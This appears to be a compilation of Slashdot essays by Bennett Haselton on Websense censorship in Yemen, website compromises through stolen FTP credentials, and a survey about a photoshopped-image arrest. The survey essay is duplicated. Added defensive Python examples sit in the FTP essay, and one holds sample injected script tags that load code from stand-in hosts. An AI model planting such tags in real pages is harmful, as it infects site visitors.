There are only about 200,000 Internet users in Yemen, compared to over six million in Saudi Arabia, millions more in other censored Middle Eastern countries, and 300 million in Internet-censored China. (And even the Yemenis' Internet access is not filtered all the time, since the ONI report says that the number of concurrent licenses for Websense purchased by the Yemeni ISPs is less than the number of Yemeni Internet users, and when the number of concurrent users exceeds the number of licenses, all requests go through unfiltered!) So it would be a small step towards global liberation of the Internet, but still equivalent to de-censoring Internet access for every resident of Boise if the city had 100% broadband penetration, which is enough to justify putting the squeeze on Websense.
What exactly would happen if Websense did revoke their license for the Yemeni ISPs? They couldn't force the ISPs to uninstall the software, but they could stop allowing them to download further updates to the Websense blocked-site list. Most installations of Websense are configured to download updates to the list every day, to block the latest adult websites as well as to try and stay ahead of newly released proxy sites. Once the list updates stopped, all existing blocked websites would remain blocked, but newly created adult sites and proxy sites would be accessible, and the filtering would gradually become less and less effective. So it would be a concrete victory for Yemeni Internet users, and not just a symbolic gesture.
How would we know if Websense went through with it, anyway, if they refuse to confirm or deny that they have revoked the licenses for Yemen? The ONI declined to tell me how exactly they determined that Yemeni ISPs were using Websense. (Not that I mind; they could have obtained this information with the help of people whose jobs and freedom would be at stake if they were found out, in which case ONI would not be able to share their confidential sources.) Presumably the ONI could repeat their research in the future to determine if Websense were still being used. However, even if they can see that Websense software is still being used to censor the Internet, it may not be easy to tell whether the Yemeni ISPs are still downloading updates to the blocked-site list. My suggestion: Create a new proxy site and don't publicize it anywhere, but report it to Websense for blocking. Test a few days later to verify that it's blocked by Websense, but not by Smartfilter or other popular blocking programs. Then see if it's blocked in Yemen as well. If not, then hopefully that means that Websense cut them off.
And then what? Maybe the Yemeni ISPs will just continue using Websense with a frozen copy of the blocked site list, reasoning that most of the well-known adult sites that users are going to try to visit, are probably already on that list. Maybe they'll set up a shell company in another country, posing as an ISP requesting a legitimate copy of Websense, and buy a new list subscription that way. But it will still be worth it to press Websense into revoking their license, even if it only breaks Internet censorship in Yemen for a few months or a year. At that point, perhaps they'll just take their business to Smartfilter like almost every other Middle Eastern country that censors the Internet.
After all, we shouldn't pick on Websense too much, when Smartfilter is censoring national Internet access for about 100 times that many users in total. If Websense says they don't provide software to government censors, then we should hold them to that. But the real scandal isn't that American censorware companies provide filters to censoring governments while claiming not to, it's that American companies are doing it at all.
-
R.I.P. FTP
Slashdot contributor Bennett Haselton says "Using FTP to administer a website is insecure -- but not for the reasons that you probably think. You yourself can stop using FTP any time you want, but how do we change the landscape Net-wide, to reduce the number of break-ins using stolen FTP credentials?" You know what to click on if you want to read the rest.
On July 1st I found that one of my less important websites, hosted on a low-cost shared Web hosting service, had been broken into. A friend emailed me to say that the site was showing up in Google's search results with the Google "This site may harm your computer" warning listed next to it. I found that on one of the pages, about 1,500 HTML script tags had been inserted, loading JavaScript files from pseudo-random Russian hostnames like "www.chk06.ru" and "www.errghr.ru", none of which are currently resolving. Usually, when such script tags are maliciously inserted into a page on a website, the script tags attempt to install spyware on the machines of people who visit the site.
I immediately replaced the infected file on the website with the backed-up clean copy from my machine, and changed the password on the website in case the attacker had gotten in by using the old one. (The original file with the script tags inserted is here if you want to examine it, but use with caution -- if the .ru hostnames in the script tags start resolving again, then opening the file could cause the JavaScript on the pages to be loaded, which might infect your machine.) Then I started investigating (a) how this probably happened; (b) whether future similar attacks could be prevented, by changing some defaults in the way that hosting accounts are set up; and (c) whether the incentives for hosting providers are such that these changes are likely to happen by themselves, or whether it will require some third-party advocacy to change what we think of as "best practices".
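The comparison described above, between the page being served and the clean backup, can be automated. The following is an added example, not part of the original essay; the site name, hostnames and HTML are constructed for illustration.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def external_script_hosts(html, site_host):
    """Count third-party hostnames referenced by <script src=...>."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    hosts = Counter()
    for src in collector.sources:
        host = (urlsplit(src).hostname or "").lower()
        # Relative URLs have no hostname: they load from the site itself.
        if host and host != site_host.lower():
            hosts[host] += 1
    return hosts


def injected_hosts(clean_html, served_html, site_host):
    """Hosts referenced more often in the served copy than in the backup."""
    before = external_script_hosts(clean_html, site_host)
    after = external_script_hosts(served_html, site_host)
    return {h: n - before[h] for h, n in after.items() if n > before[h]}


# Constructed sample data (hypothetical site and hostnames).
SITE_HOST = "www.mysite.example"
CLEAN_HTML = (
    "<html><head>"
    '<script src="/js/site.js"></script>'
    '<script src="http://www.mysite.example/js/menu.js"></script>'
    '<script src="https://stats.example/a.js"></script>'
    "</head><body><p>Hello</p></body></html>"
)
INJECTED = (
    '<script src="http://www.qx7.example/j.js"></script>' * 2
    + '<SCRIPT SRC="//www.zz9.example/k.js"></SCRIPT>'
)
SERVED_HTML = CLEAN_HTML.replace("</body>", INJECTED + "</body>")

if __name__ == "__main__":
    for host, extra in sorted(injected_hosts(CLEAN_HTML, SERVED_HTML, SITE_HOST).items()):
        print(f"{extra} new script reference(s) to {host}")
```

Run against the live copy on a schedule, a non-empty result is the signal to restore the backup and rotate the account password.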
Denis Sinegubko, the webmaster of Unmask Parasites, a free service that scans websites on demand for signs of break-ins, says:
The majority of web site compromises happen because of:
- Stolen FTP credentials. Spyware on webmasters' computers: key-loggers, traffic sniffers (FTP protocol sends username/password as plain text), trojans that steal credentials from various programs' configuration files (FTP clients, DreamWeaver, etc).
- Security holes in popular web software: CMS (Joomla, Drupal, etc), Forums (phpBB, vBulletin, Simple Machines, etc), Blogs (WordPress). Once a vulnerability is discovered, hackers configure their automated tools to search the web for websites running vulnerable versions of the software and exploit them. This can be done easily and at almost no cost when they have an army of zombie computers.
- Security hole in "in-house" web software. Many novice (and even many experienced) web developers don't properly sanitize user input making various attacks possible (SQL injections, XSS, etc)
- Poor security practices (Something that should be manually configured by site/server admins and cannot be fixed with automated security updates): Weak passwords, open ports, insufficiently strict permissions for limited accounts, files and directories with world write permissions, etc.
I didn't have any third-party web software or custom-made software installed on the PublicEditorMyAss.com site, the password was a seven-letter meaningless mix of letters and numbers, and I didn't have permission to change most of the things like open ports and file permissions. That left the possibility of stolen FTP credentials. This is in fact what Sinegubko says is the most common cause of such break-ins:
I guess 90% of attacks use stolen FTP credentials this year. Check this Google's graph that shows the top 10 malware sites as counted by the number of compromised web sites that referenced it:
http://googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html
I reviewed the 4 most widespread of them (Gumblar, Martuz, Goooogleadsense, Googleanalytlcs). All four used stolen FTP credentials to penetrate web sites and upload malicious content. The chances are the rest used this vector too.
When the PublicEditorMyAss.com site was set up, the default setting was for pages to be edited over FTP. Even though FTP sends and receives passwords without encrypting them (in contrast with alternatives like SFTP or "secure FTP", which encrypts passwords), for a long time I had assumed that this was not a major security problem, because in order for an attacker to intercept the passwords in transit, they would have to control a machine somewhere on the path between my home computer and the PublicEditorMyAss.com server. I figured this wasn't worth worrying about, because it was much more likely that an attacker would attempt to steal the password by installing spyware on my home computer. And if an attacker managed to do that, then I assumed that the risk of passwords being stolen by spyware was about the same whether I used FTP or SFTP -- because either way, the spyware could just steal my password by reading it out of a configuration file where the password was stored. (Even though FTP and SFTP programs both store passwords in an encrypted format, the programs have to be able to decrypt the passwords in order to use them whenever the user wants to open a connection. So the spyware could just mimic whatever steps the client programs use to decrypt the stored passwords, in order to steal one of my passwords stored in a file.) So, I assumed it made no difference whether I used FTP or SFTP.
But according to what Sinegubko told me, this reasoning was probably wrong. The problem is that even though spyware installed on your machine could read passwords that are stored in configuration files, it would be a lot of work to write a spyware program that could do this, because every FTP program and SFTP program stores passwords according to a different algorithm. It's much simpler for spyware to simply watch the traffic sent and received from your machine, so that any unencrypted passwords will be spotted:
[Passwords can be stolen by] sniffers that read all TCP traffic on local computers. Like personal firewalls but malicious. They can easily intercept FTP credentials since they are sent as a plain text.
Sinegubko describes how one of his contacts obtained evidence that a common spyware program was doing exactly this:
One of them even infected a spare WinXP computer (with Gumblar) to test the consequences. On the infected computer he created a new account in a popular FTP client and saved it. The server address was correct (his server) and the username/password pair was not valid. A few hours later in FTP logs, he discovered login attempts that used that invalid username/password pair from a Singapore IP, then from a Florida IP, then some other country's IP. Apparently the FTP credentials were somehow stolen from that infected computer.
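The test described in the quote above is a canary credential: a login that exists nowhere except on one workstation, so any appearance of it in server logs means that workstation leaked it. The following is an added example of the server-side check, not part of the original essay or of Sinegubko's message; the log format, username and addresses are constructed, and a real FTP server's log lines would need their own pattern.

```python
import re
from datetime import datetime, timezone

# Constructed log format, assumed for this example only:
#   <UTC timestamp> <client IP> LOGIN user=<name> result=<OK|FAIL>
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\dZ) (?P<ip>\S+) "
    r"LOGIN user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)


def parse_ts(text):
    """Parse the constructed timestamp format into an aware UTC datetime."""
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def find_canary_use(log_lines, canaries):
    """Report every use of a canary username.

    canaries maps a canary username to the time it was saved on the
    workstation. Returns (report, skipped): report maps each canary seen in
    the log to its attempt count, source IPs in order of first appearance and
    the hours between planting and first use; skipped counts unparsable lines.
    """
    report = {}
    skipped = 0
    for line in log_lines:
        m = LINE_RE.match(line.strip())
        if not m:
            skipped += 1
            continue
        try:
            seen_at = parse_ts(m["ts"])
        except ValueError:  # digits in the right places but not a real date
            skipped += 1
            continue
        user = m["user"]
        if user not in canaries:
            continue
        entry = report.setdefault(
            user, {"attempts": 0, "sources": [], "first_seen": seen_at}
        )
        entry["attempts"] += 1
        entry["first_seen"] = min(entry["first_seen"], seen_at)
        if m["ip"] not in entry["sources"]:
            entry["sources"].append(m["ip"])
    for user, entry in report.items():
        delay = entry.pop("first_seen") - canaries[user]
        entry["hours_to_first_use"] = round(delay.total_seconds() / 3600, 2)
    return report, skipped


# Constructed sample log; addresses come from the documentation ranges.
SAMPLE_LOG = """\
2009-07-01T09:00:12Z 192.0.2.10 LOGIN user=webmaster result=OK
2009-07-01T14:41:03Z 203.0.113.7 LOGIN user=canary_7f3a result=FAIL
2009-07-01T14:41:09Z 203.0.113.7 LOGIN user=canary_7f3a result=FAIL
garbled line without the expected fields
2009-07-01T16:02:55Z 198.51.100.23 LOGIN user=canary_7f3a result=FAIL
2009-07-01T18:30:00Z 192.0.2.10 LOGIN user=webmaster result=OK
""".splitlines()

# Hypothetical canary account and the time it was saved in the FTP client.
CANARIES = {"canary_7f3a": parse_ts("2009-07-01T10:11:03Z")}

if __name__ == "__main__":
    report, skipped = find_canary_use(SAMPLE_LOG, CANARIES)
    for user, info in report.items():
        print(user, info, f"({skipped} line(s) skipped)")
```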
I know of only two instances where I've ever definitely been infected with spyware. I don't do stupid things like downloading and running strange programs from third-party sites, so I think both infections were probably caused by a site exploiting a security hole in Internet Explorer, or in a plug-in like Adobe Acrobat or the Flash player. Both times, once I noticed I was infected, I got rid of the infection with Malwarebytes, but I don't know how much damage the spyware did in the meantime.
So this was a case where a little knowledge can be a dangerous thing. If I had known nothing about Internet architecture, and someone told me "FTP is less secure than SFTP," I would have found a way to switch to administering the site via SFTP. But because I knew that the main reason FTP was considered "insecure" was because it transmitted passwords unencrypted, but I also knew that most of the machines relaying those passwords in transit were secure and trustworthy, I thought it didn't matter. Now it seems that is probably how my password got compromised after all.
In that case, why don't more people switch to administering their sites via SFTP instead of FTP? Here are the steps it took me to enable SFTP on my GoDaddy hosting account. Feel free to use this as a reference, but the obvious point is that as long as this many steps are required, it's safe to say that most users won't be switching:
- Go to the "Hosting" menu and pick "My Hosting Account."
- Next to the name of your website, pick "Manage Account." This will open the Hosting Control Center.
- In Hosting Control Center, click to expand the "Settings" options.
- In the "Settings" control panel, click the "SSH" icon.
- You will see a page saying "SSH is not set up", and prompting you to enter a phone number so that their automated service can call you with a PIN number. After you enter your phone number, the phone rings a second later, and you enter the PIN in a form on the GoDaddy website.
- You will then see a page which says:
  Current Hosting Account Status: Pending Account Change
  Your request to enable SSH is being processed. This upgrade may take up to 24 hours.
In fact, even if only one step were required to switch, most users probably wouldn't change from the default setting to use FTP, due to the eternal, unchangeable fact that most people do not change their default settings, ever. (What percent of users ever change the default set of toolbars that are displayed at the top of their Web browser window?)
If more Web hosting companies made SFTP the default, then the number of websites that were compromised by stolen login credentials, would probably go down. Spyware authors might start to make their programs smarter at that point, enabling them to read the passwords stored by popular FTP and SFTP programs, so that it would make no difference whether the passwords were transmitted in the clear or not. However, this would be harder for spyware authors to do correctly, so it would at least raise the bar for a successful malware attack, and the number of compromised websites would be reduced.
Unfortunately, Web hosting companies don't have much incentive to make users switch to the more secure SFTP protocol. This isn't necessarily true of all security risks; sometimes the hosting company has a strong incentive to pass on the right wisdom (and select the right default settings) for their customers. From the hosting company's point of view, you could divide risks into three categories:
- Risks where the hosting company pays a large part of the price for a customer's machine being compromised. For example, if a cyber-criminal takes over a customer's machine and uses it to launch a denial-of-service attack by sending it a flood of traffic, the hosting company will see that traffic spike on their network. The hosting company has the most incentive to help prevent these types of attacks.
- Risks where the hosting company doesn't directly pay a price for the customer's machine being compromised, but they may have to deal with complaints sent in by third parties. For example, a customer's website could get broken into, and script tags could be inserted into the pages that cause visitors' machines to be infected with spyware. Those visitors might complain to the webmaster of the infected site, or they might complain to the hosting company, which then forwards the complaint to the webmaster. The hosting company may have to provide a few minutes of tech support to the customer, advising them to change their password and scan their own machine for spyware, but they probably won't incur any other material costs.
- Risks where neither the hosting company nor the customer pays a price for the machine being infected, but the price is paid by "Internet users as a whole." The only attack that I can think of in this category, is an attack where a cyber-criminal inserts key words into your web page and links them to his site, in order to increase his Google ranking for searches for those key words. Neither the website owner, nor any visitors to the website, are victimized directly; the harm being done is that the quality of Google search results is reduced for everybody. The only reports of the attack would probably come from "good Samaritan" Web surfers, who tell the hosting company or the webmaster that one of their pages has been vandalized.
When a customer's FTP credentials are stolen, the price paid by the hosting company lies somewhere in the middle. An attacker who stole my current PublicEditorMyAss.com credentials would only be able to deface the content on the site, but they wouldn't be able to launch an attack against a third-party network (my PublicEditorMyAss.com hosting account doesn't have the ability to initiate an outgoing connection to a third-party site).
Weighing in the other direction are the costs of switching to SFTP. If existing customers are forcibly switched over, phone lines will be clogged by customers wanting to know why their old method of logging in to their site has suddenly stopped working. A better choice would be to allow existing customers to stay with FTP while making SFTP the default for new customers. But there is a time and money cost of changing anything, even a default setting.
So GoDaddy doesn't have much incentive to make SFTP their new default. Indeed, I've used many different shared hosting companies before I started running proxies exclusively on dedicated servers, and none of the shared hosting companies ever used anything but FTP as the default method for customers to administer their websites. So who can blame them? They're not making the choice that makes the most sense for their customers or for Internet security as a whole, they're making the choice that makes the most sense in terms of costs and benefits for themselves, and I'm not being judgmental about that. We shouldn't expect most companies to ever behave in any other way.
That's why I think that glib "solutions" to security problems, like "Everybody install anti-virus software", or "Everybody stop using Windows", aren't helpful, because regardless of whether these ideas would work if everybody actually followed them, the fact is that most people won't. The problems have to be addressed in terms of changing incentives for the choices people make.
What's an idea for reducing the risks of FTP credentials stolen by malware, that addresses the incentives problem? Maybe give tax breaks to Web hosting companies that set up customer accounts to use SFTP instead of FTP by default? Or ask more computer vendors to include a desktop link to pre-installed SFTP software, so that when Web hosting companies present options to their customers, it's easier for users to choose the SFTP option since they have a client already installed? (I was tempted to recommend that Microsoft include a universal SFTP client pre-installed in Windows with a prominent desktop link, but the problem with that is that if almost everybody used the same SFTP client, malware authors would have greater incentive to reverse-engineer the algorithm that the client used to store saved passwords -- and then passwords would be just as easily accessible to spyware, as if the user were using FTP all along. So a good mix of SFTP clients is safer for this purpose.)
Since the difference between SFTP and FTP usually only matters in cases where a customer's machine has been infected with malware, obviously the best solution is to avoid malware altogether, but that's a much harder problem to solve, as long as malware authors can keep finding security holes in Internet Explorer and other popular programs. Making SFTP the new standard for Web hosting accounts is something that we know how to do, right now. The incentives aren't currently right for Web hosting companies to make it happen. But there may be ways to change that, and I'll bet some people can think of better ideas than the ones I've suggested. I'm just saying that the incentives problem is where attention should be focused.
-
The Mathletes and the Miley Photoshop
Frequent Slashdot contributor Bennett Haselton's essay this week is about "A Tennessee man is arrested for possessing a picture of Miley Cyrus's face superimposed on a nude woman's body. In a survey that I posted on the Web, a majority of respondents said the man violated the law -- except for respondents who say they were good at math in school, who as a group answered the survey differently from everyone else." Continue on to see how.
On June 24, a Tennessee man was arrested for possessing photos that showed the faces of three underage girls, including Miley Cyrus, superimposed onto the nude bodies of adult women. Assistant District Attorney Dave Denny said of the arrest, "When you have the face of a small child affixed to a nude body of a mature woman, it's going to be the state's position that this is for sexual gratification and that this is simulated sexual activity." The phrase "simulated sexual activity" apparently refers to a Tennessee sex crimes law which states in part: "It is unlawful for any person to knowingly possess material that includes a minor engaged in simulated sexual activity that is patently offensive."
Assuming this is the crime that the D.A. plans to charge him with, to me it seems obvious that the defendant didn't violate the law as written. For one thing, if the nude women in the pictures were just standing there (and neither the article nor the D.A.'s statement suggests otherwise), then there was no "sexual activity" in the photos of any kind, real or simulated. But even if the nude adult women in the photos had been engaged in sexual activity (even just striking a mildly sexy pose), the law still would not apply, because the law requires an actual minor to actually be engaged in something, even if that "something" is simulated sexual activity. So if a video showed a real minor that appeared to be masturbating or having sex with someone in a manner that was "patently offensive", that could violate the law. (Hopefully the "patently offensive" clause would exclude artistic movies like The Tin Drum, although that defense has not always worked.) But if the girls' faces were simply cut and pasted onto the bodies of the women in the photos, then the minors in question were not "engaged in" anything. The D.A. appears to have confused "material that includes a minor engaged in simulated sexual activity" with "material that simulates a minor engaged in sexual activity". And the D.A.'s statement that "this is for sexual gratification and that this is simulated sexual activity" — clearly implying that the pictures are for sexual gratification and therefore this is "simulated sexual activity" — is ridiculous. The defendant probably used pictures of Miley with her clothes on for "sexual gratification" — does that make the photos "simulated sexual activity"? (Dave Denny's office did not respond to my request for comment.)
But I was more interested in a different question: What would people in a survey think about whether the defendant violated the law? And, would people who are good at math, answer the question differently from everyone else? And would those people answer the question differently from people who are good at, say, English composition?
That might seem like an odd twist to put on it. But if you can show that a certain answer correlates with mathematical ability, that indicates something special about that answer. And if you can show that that answer appeals to people with math skills, but not to people with English/writing/composition skills, then that indicates something interesting not just about that answer, but about mathematical ability as well, as opposed to writing ability. Whether that answer is "right" or "wrong" (or whether you think those terms are even meaningful for a legal opinion), it is a fact, not an opinion, that people with self-reported higher math skills are more likely to pick that as the correct choice.
By contrast, when the D.A. makes a public statement about the criminality of the defendant's actions, the implication is that we should give some weight to his statements because of his qualifications, such as being a member of the bar. But if we were to ask other bar members to decide independently of each other whether the defendant committed a crime, would they converge on the same answer? If not, then why should we listen to him, as opposed to someone else with the same credentials? When an expert cites their credentials in support of an opinion, if it's not true that other experts with the same credentials would back them up on that opinion, I don't think people realize the extent to which there is no there there.
So in the survey, I described the man's alleged actions and the Tennessee statute, and asked people if they thought he had violated the law. I also asked respondents to rate their math skills as "Excellent"/"Very good"/"Good"/"Fair"/"Poor" and to rate their English/composition skills as "Excellent"/"Very good"/"Good"/"Fair"/"Poor". The survey was posted on the Amazon Mechanical Turk site, where you can post "tasks" for people to complete in exchange for small payments of, say, 25 cents apiece. Some companies use this for grunt work (like hiring people to review user-submitted profile photos to make sure they don't contain nudity), but I use the site mainly to conduct surveys.
I think it's unlikely that the Mechanical Turk users are a representative cross-section of the population, but I use it more to find significant relative differences between demographic groups. If 60% of women on the site answer a question one way and 80% of men answer it the other way, that probably suggests that in a real cross-sectional survey of the population, men and women would largely disagree on the answer as well. (The alternative would be that the kind of men and women who use Mechanical Turk are predisposed to answer the question differently along gender lines in a way that average men and women are not, but that seems unlikely.)
For this survey, I offered users 25 cents apiece for completing it and collected 127 responses. The results in a nutshell:
- About two-thirds of all respondents (85 out of 127) said that the man did violate the law.
- However, among the respondents who rated their own math skills as "Excellent", only 44% (12 out of 27) said he violated the law, and 56% (15 out of 27) said that he did not. Out of all ten ability groupings (five different ability groupings for math, from "Excellent" to "Poor", and five for English), this was the only group where a majority said that the defendant didn't violate the statute.
- Respondents who self-rated their English/composition skills as "Excellent", were also more likely than average to vote that the man did not violate the law, but a majority of them still voted that he did.
These results are significant at the 99% level, which you can check using an online statistical significance calculator. In other words, despite the modest sample size, the answers given by the respondents with self-rated "excellent" math skills are so starkly different from everyone else's, that there's less than a 1 in 100 chance that the difference is due to coincidence. Almost certainly, something about mathematical ability is correlated with a person's likelihood of giving the "not guilty" answer. (At this point I'm going to give in to my bias and hereinafter refer to that as the "right answer.")
Furthermore, while respondents with "excellent" English/composition skills were also more likely than average to get the right answer (a difference that is also significant at the 99% level, given the collected data), they were considerably less likely to do so, than the users with self-reported "excellent" math skills (again, significant at the 99% level). I tabulated all the responses.
If I could afford to pay a larger sample, I would investigate whether the effect of "excellent" English/composition skills disappears entirely when you control for math skills. In other words, it's possible that the people with excellent English/composition skills were more likely than average to get the right answer, but only insofar as their English/composition skills were correlated with excellent math ability — and maybe people with "excellent" English/composition skills, but only average math ability, score no better than the average respondents.
One thing that jumps out at me: Even though 44% of the 27 people with "excellent" math skills said the man did violate the law, when you look at the 58 people who self-reported "very good" math skills, 74% of them said he violated the law. This would appear to confound my original hypothesis that good math skills lead people to converge on the correct answer. But I suspect that many people with self-reported "very good" math grades were probably just good students who studied hard and did the practice problems and got good grades in math, but without necessarily having the insight that makes someone an "excellent" math student. Without that insight, there was no reason to expect them to be better than average at answering a question that has no resemblance to their textbook's practice problems.
In fact, I suspect that many of the people who self-reported their math skills as "excellent", and who still answered "yes" to the question of whether the man violated the law, probably fell into that studious-but-not-insightful category as well. It would be interesting to test whether, if you required respondents to actually answer a math question — not a standard textbook question, but a tricky question that required people to demonstrate an understanding of what is actually going on — the correlation between correctly answering that question, and "correctly" answering the legal question, would be even stronger.
But what I think is even more important than the correlation of the correct answer with "excellent" math ability, was the significantly lower correlation of the correct answer with "excellent" English skills. I've been saying for years that you can use excellent prose to defend an illogical idea, or you can use poorly crafted prose to defend a good idea, and so if you care about the quality of an idea and its impact on the real world, you have to look at the substance of an argument, not the style. Economics professor Steven Landsburg writes in his forthcoming philosophy book The Big Questions,
The bane of a college professor's existence is the student who has been taught in a writing course that there is such a thing as good writing, independent of having something to say. Students turn in well-organized grammatically correct prose, with the occasional stylistic flourish in lieu of any logical argument, and don't understand why they've earned grades of zero.
I call such people "vocabulemics", who seem to think the purpose of a discussion is to vomit up as many SAT vocab prep words as possible, rather than to form a coherent point. I've tried, and I can't think of any coherent point that could be made in order to argue that the Miley photoshopper really did violate the Tennessee law.
If you're still unconvinced by the results of a survey of mathletes, consider that they do match up well with the comments provided to me by Mark Rasch, a lawyer and computer security specialist with Secure IT Experts and the former head of the Department of Justice Computer Crimes Unit:
First, an image of a minor engaged in simulated sexual activity is not the same as a simulated minor engaged in sexual activity... In other words, if you posed actual minors, nude, and made it look like they were having sex, it would be a crime, even though there was no "actual" sexual activity. In most other contexts, when the legislature says "simulated sexual activity" they mean real people engaged in what appears to be sex. The government is trying to apply this theory to real sex but simulated minors. I don't think that passes statutory muster.. it's not what the statute prohibits... Under that rationale, if you had, for example, a picture of two dogs mating, and glued pictures of kids on the dogs' faces, this would be "simulated sexual activity" but would not be prosecutable. Where do you draw the line? Under federal law, you typically draw the line at the use and posing of real kids.
Depending on how you look at it, you may think that this opinion from credentialed expert Mr. Rasch, vindicates the opinion of the math aficionados who voted that the defendant did not violate the law. I think it's the other way around — the fact that this answer was correlated in the survey responses with mathematical ability, vindicates the opinion of Mr. Rasch.
-
The Mathletes and the Miley Photoshop
Frequent Slashdot contributor Bennett Haselton's essay this week is about "A Tennessee man is arrested for possessing a picture of Miley Cyrus's face superimposed on a nude woman's body. In a survey that I posted on the Web, a majority of respondents said the man violated the law -- except for respondents who say they were good at math in school, who as a group answered the survey differently from everyone else." Continue on to see how.
On June 24, a Tennessee man was arrested for possessing photos that showed the faces of three underage girls, including Miley Cyrus, superimposed onto the nude bodies of adult women. Assistant District Attorney Dave Denny said of the arrest, "When you have the face of a small child affixed to a nude body of a mature woman, it's going to be the state's position that this is for sexual gratification and that this is simulated sexual activity." The phrase "simulated sexual activity" apparently refers to a Tennessee sex crimes law which states in part: "It is unlawful for any person to knowingly possess material that includes a minor engaged in simulated sexual activity that is patently offensive."
Assuming this is the crime that the D.A. plans to charge him with, to me it seems obvious that the defendant didn't violate the law as written. For one thing, if the nude women in the pictures were just standing there (and neither the article nor the D.A.'s statement suggests otherwise), then there was no "sexual activity" in the photos of any kind, real or simulated. But even if the nude adult women in the photos had been engaged in sexual activity (even just striking a mildly sexy pose), the law still would not apply, because the law requires an actual minor to actually be engaged in something, even if that "something" is simulated sexual activity. So if a video showed a real minor that appeared to be masturbating or having sex with someone in a manner that was "patently offensive", that could violate the law. (Hopefully the "patently offensive" clause would exclude artistic movies like The Tin Drum, although that defense has not always worked.) But if the girls' faces were simply cut and pasted onto the bodies of the women in the photos, then the minors in question were not "engaged in" anything. The D.A. appears to have confused "material that includes a minor engaged in simulated sexual activity" with "material that simulates a minor engaged in sexual activity". And the D.A.'s statement that "this is for sexual gratification and that this is simulated sexual activity" — clearly implying that the pictures are for sexual gratification and therefore this is "simulated sexual activity" — is ridiculous. The defendant probably used pictures of Miley with her clothes on for "sexual gratification" — does that make the photos "simulated sexual activity"? (Dave Denny's office did not respond to my request for comment.)
But I was more interested in a different question: What would people in a survey think about whether the defendant violated the law? And, would people who are good at math, answer the question differently from everyone else? And would those people answer the question differently from people who are good at, say, English composition?
That might seem like an odd twist to put on it. But if you can show that a certain answer correlates with mathematical ability, that indicates something special about that answer. And if you can show that that answer appeals to people with math skills, but not to people with English/writing/composition skills, then that indicates something interesting not just about that answer, but about mathematical ability as well, as opposed to writing ability. Whether that answer is "right" or "wrong" (or whether you think those terms are even meaningful for a legal opinion), it is a fact, not an opinion, that people with self-reported higher math skills are more likely to pick that as the correct choice.
By contrast, when the D.A. makes a public statement about the criminality of the defendant's actions, the implication is that we should give some weight to his statements because of his qualifications, such as being a member of the bar. But if we were to ask other bar members to decide independently of each other whether the defendant committed a crime, would they converge on the same answer? If not, then why should we listen to him, as opposed to someone else with the same credentials? When an expert cites their credentials in support of an opinion, if it's not true that other experts with the same credentials would back them up on that opinion, I don't think people realize the extent to which there is no there there.
So in the survey, I described the man's alleged actions and the Tennessee statute, and asked people if they thought he had violated the law. I also asked respondents to rate their math skills as "Excellent"/"Very good"/"Good"/"Fair"/"Poor" and to rate their English/composition skills as "Excellent"/"Very good"/"Good"/"Fair"/"Poor". The survey was posted on the Amazon Mechanical Turk site, where you can post "tasks" for people to complete in exchange for small payments of, say, 25 cents apiece. Some companies use this for grunt work (like hiring people to review user-submitted profile photos to make sure they don't contain nudity), but I use the site mainly to conduct surveys.
I think it's unlikely that the Mechanical Turk users are a representative cross-section of the population, but I use it more to find significant relative differences between demographic groups. If 60% of women on the site answer a question one way and 80% of men answer it the other way, that probably suggests that in a real cross-sectional survey of the population, men and women would largely disagree on the answer as well. (The alternative would be that the kind of men and women who use Mechanical Turk are predisposed to answer the question differently along gender lines in a way that average men and women are not, but that seems unlikely.)
For this survey, I offered users 25 cents apiece for completing it and collected 127 responses. The results in a nutshell:
- About two-thirds of all respondents (85 out of 127) said that the man did violate the law.
- However, among the respondents who rated their own math skills as "Excellent", only 44% (12 out of 27) said he violated the law, and 56% (15 out of 27) said that he did not. Out of all ten ability groupings (five different ability groupings for math, from "Excellent" to "Poor", and five for English), this was the only group where a majority said that the defendant didn't violate the statute.
- Respondents who self-rated their English/composition skills as "Excellent" were also more likely than average to vote that the man did not violate the law, but a majority of them still voted that he did.
These results are significant at the 99% level, which you can check using an online statistical significance calculator. In other words, despite the modest sample size, the answers given by the respondents with self-rated "excellent" math skills are so starkly different from everyone else's, that there's less than a 1 in 100 chance that the difference is due to coincidence. Almost certainly, something about mathematical ability is correlated with a person's likelihood of giving the "not guilty" answer. (At this point I'm going to give in to my bias and hereinafter refer to that as the "right answer.")
Furthermore, while respondents with "excellent" English/composition skills were also more likely than average to get the right answer (a difference that is also significant at the 99% level, given the collected data), they were considerably less likely to do so, than the users with self-reported "excellent" math skills (again, significant at the 99% level). I tabulated all the responses.
If I could afford to pay a larger sample, I would investigate whether the effect of "excellent" English/composition skills disappears entirely when you control for math skills. In other words, it's possible that the people with excellent English/composition skills were more likely than average to get the right answer, but only insofar as their English/composition skills were correlated with excellent math ability — and maybe people with "excellent" English/composition skills, but only average math ability, score no better than the average respondents.
One thing that jumps out at me: Even though 44% of the 27 people with "excellent" math skills said the man did violate the law, when you look at the 58 people who self-reported "very good" math skills, 74% of them said he violated the law. This would appear to confound my original hypothesis that good math skills lead people to converge on the correct answer. But I suspect that many people with self-reported "very good" math grades were probably just good students who studied hard and did the practice problems and got good grades in math, but without necessarily having the insight that makes someone an "excellent" math student. Without that insight, there was no reason to expect them to be better than average at answering a question that has no resemblance to their textbook's practice problems.
In fact, I suspect that many of the people who self-reported their math skills as "excellent", and who still answered "yes" to the question of whether the man violated the law, probably fell into that studious-but-not-insightful category as well. It would be interesting to test whether if you required respondents to actually answer a math question — not a standard textbook question, but a tricky question that required people to demonstrate an understanding of what is actually going on — if the correlation between correctly answering that question, and "correctly" answering the legal question, is even stronger.
